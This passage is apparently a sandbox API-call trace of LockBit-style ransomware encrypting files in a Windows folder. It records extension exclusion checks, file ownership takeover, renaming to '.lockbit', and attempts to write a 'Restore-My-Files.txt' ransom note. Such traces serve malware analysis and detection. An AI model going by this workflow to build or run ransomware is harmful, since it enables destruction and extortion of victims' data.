lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0096.876] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0096.877] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0096.877] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0096.877] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ipsen.xml") returned 1 [0096.877] lstrcmpiW (lpString1="ntldr", lpString2="ipsen.xml") returned 1 [0096.877] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ipsen.xml") returned 1 [0096.877] lstrcmpiW (lpString1="bootsect.bak", lpString2="ipsen.xml") returned -1 [0096.877] lstrcmpiW (lpString1="autorun.inf", lpString2="ipsen.xml") returned -1 [0096.877] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0096.877] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned=".xml" [0096.877] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0096.878] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0096.878] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0096.879] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.lockbit") returned 69 [0096.879] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0096.879] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.lockbit")) returned 0 [0096.881] GetLastError () returned 0x5 [0096.885] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0096.932] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0096.932] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0096.933] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0096.933] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0096.933] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x52c, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0096.934] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0096.934] NtQueryInformationFile (in: FileHandle=0x52c, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0096.972] NtClose (Handle=0x52c) returned 0x0 [0096.972] RtlFreeAnsiString (AnsiString="\\") [0096.972] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x52c) returned 1 [0096.972] malloc (_Size=0x200) returned 0x3981cc0 [0096.972] GetTokenInformation (in: TokenHandle=0x52c, TokenInformationClass=0x1, TokenInformation=0x3981cc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x3981cc0, ReturnLength=0x344cda0) returned 1 [0096.972] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0096.972] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x3981cc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0096.972] CloseHandle (hObject=0x52c) returned 1 [0096.972] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0096.973] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0096.973] free (_Block=0x3981cc0) [0096.973] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0096.973] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.lockbit")) returned 1 [0096.974] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x52c [0096.974] CreateIoCompletionPort (FileHandle=0x52c, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0096.974] malloc (_Size=0x40068) returned 0x3940048 [0096.974] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=2578) returned 1 [0096.974] ReadFile (in: hFile=0x52c, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 0x0 [0096.990] GetLastError () returned 0x3e5 [0096.990] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0096.990] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0096.990] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.991] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ipsesp.xml", cAlternateFileName="")) returned 1 [0096.991] lstrcmpiW (lpString1=".", lpString2="ipsesp.xml") returned -1 [0096.991] lstrcmpiW (lpString1="..", lpString2="ipsesp.xml") returned -1 [0096.991] PathFindExtensionW (pszPath="ipsesp.xml") returned=".xml" [0096.991] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0096.991] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0096.991] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0096.991] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0096.991] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0096.991] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0096.991] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0096.991] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0096.992] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0096.993] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0096.993] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0096.993] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0096.993] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0096.993] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0096.993] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0096.993] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0096.993] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0096.993] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0096.993] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0096.993] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0096.993] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0096.993] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0096.993] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0096.993] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0096.993] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ipsesp.xml") returned 1 [0096.993] lstrcmpiW (lpString1="ntldr", lpString2="ipsesp.xml") returned 1 [0096.993] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ipsesp.xml") returned 1 [0096.993] lstrcmpiW (lpString1="bootsect.bak", lpString2="ipsesp.xml") returned -1 [0096.993] lstrcmpiW (lpString1="autorun.inf", lpString2="ipsesp.xml") returned -1 [0096.993] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0096.993] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned=".xml" [0096.994] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0096.994] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0096.994] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0096.995] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0096.995] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0096.995] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0096.995] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0096.995] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.lockbit") returned 70 [0096.995] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0096.995] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.lockbit")) returned 0 [0096.995] GetLastError () returned 0x5 [0096.996] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0096.996] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0096.996] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0096.997] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0096.997] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0096.998] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x534, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0096.999] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0097.278] NtQueryInformationFile (in: FileHandle=0x534, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0097.616] NtClose (Handle=0x534) returned 0x0 [0097.616] RtlFreeAnsiString (AnsiString="\\") [0097.617] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x534) returned 1 [0097.617] malloc (_Size=0x200) returned 0x3981cc0 [0097.617] GetTokenInformation (in: TokenHandle=0x534, TokenInformationClass=0x1, TokenInformation=0x3981cc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x3981cc0, ReturnLength=0x344cda0) returned 1 [0097.617] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0097.617] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x3981cc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0097.617] CloseHandle (hObject=0x534) returned 1 [0097.617] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0097.617] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0097.617] free (_Block=0x3981cc0) [0097.618] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0097.618] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.lockbit")) returned 1 [0097.618] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x534 [0097.619] CreateIoCompletionPort (FileHandle=0x534, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0097.619] malloc (_Size=0x40068) returned 0x3940048 [0097.619] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=3024) returned 1 [0097.619] ReadFile (in: hFile=0x534, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0097.621] GetLastError () returned 0x3e5 [0097.621] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0097.621] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0097.621] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.621] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58cd8515, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x58cd8515, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x5ca35e50, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="IPSEventLogMsg.dll", cAlternateFileName="")) returned 1 [0097.621] lstrcmpiW (lpString1=".", lpString2="IPSEventLogMsg.dll") returned -1 [0097.621] lstrcmpiW (lpString1="..", lpString2="IPSEventLogMsg.dll") returned -1 [0097.621] PathFindExtensionW (pszPath="IPSEventLogMsg.dll") returned=".dll" [0097.621] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0097.621] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0097.622] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0097.622] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0097.622] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0097.622] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0097.622] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0097.622] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0097.622] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0097.622] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0097.622] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0097.622] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0097.622] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0097.622] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0097.622] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0097.622] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0097.622] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0097.622] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0097.622] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0097.623] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0097.623] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0097.623] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0097.623] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 